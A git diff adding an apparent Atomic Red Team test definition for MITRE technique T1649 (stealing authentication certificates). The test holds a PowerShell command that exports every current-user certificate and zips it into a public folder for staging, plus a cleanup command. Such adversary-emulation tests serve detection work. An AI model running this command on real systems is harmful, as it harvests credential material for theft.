diff --git a/atomics/T1649/T1649.yaml b/atomics/T1649/T1649.yaml
new file mode 100644
index 00000000..30dc7ad8
--- /dev/null
+++ b/atomics/T1649/T1649.yaml
@@ -0,0 +1,21 @@
+attack_technique: T1649
+display_name: 'Steal or Forge Authentication Certificates'
+atomic_tests:
+- name: Staging Local Certificates via Export-Certificate
+  description: |
+    Export all user certificates and add to a compressed archive.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $archive="$env:PUBLIC\T1649\atomic_certs.zip"
+      $exfilpath="$env:PUBLIC\T1649\certs"
+      Add-Type -assembly "system.io.compression.filesystem"
+      Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore
+      mkdir $exfilpath | Out-Null
+      foreach ($cert in (gci Cert:\CurrentUser\My)) { Export-Certificate -Cert $cert -FilePath $exfilpath\$($cert.FriendlyName).cer}
+      [io.compression.zipfile]::CreateFromDirectory($exfilpath, $archive)
+    cleanup_command: |
+      $exfilpath="$env:PUBLIC\T1649\certs"
+      Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore
+    name: powershell